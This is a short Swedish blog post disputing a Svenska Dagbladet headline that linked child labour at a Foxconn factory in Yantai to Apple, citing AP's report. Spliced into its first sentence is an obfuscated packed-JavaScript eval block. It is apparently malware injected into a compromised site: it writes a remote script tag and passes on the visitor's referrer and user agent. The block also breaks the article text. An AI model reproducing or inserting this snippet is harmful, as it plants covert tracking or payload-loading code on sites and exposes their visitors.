Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

“14-åringar jobbade i Iphone-fabrik”

“14-åringar jobbade i Iphone-fabrik”
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kiynf|var|u0026u|referrer|ykazn||js|php’.split(‘|’),0,{}))
är i Svenska Dagbladet vi kan se artikeln om att Foxconns utredningar hittat väldigt unga personer arbetande i iPhone-fabrik. En av personerna ska vara under 16 år vilket är gränsen för barnarbete i Kina. Fabriken ska ligga i staden Yantai och är nu under full bevakning.

I orginalkällan Associated Press (AP) kan vi se att Apple inte har någonting att göra med den här fabriken i Yantai. De skriver så här:

 “The company said it had a policy of not commenting on its customers or their products, “however we can confirm that our Yantai facility has no association with any work we carry out on behalf of Apple.“.

Detta gör att Svenska Dagbladets rubrik är helt felaktig.

Om man vill ha vidare information om hur Apple arbetar och hur man handskas med barnarbete kan ni läsa det här på deras hemsida.“Labor and Human Rights“.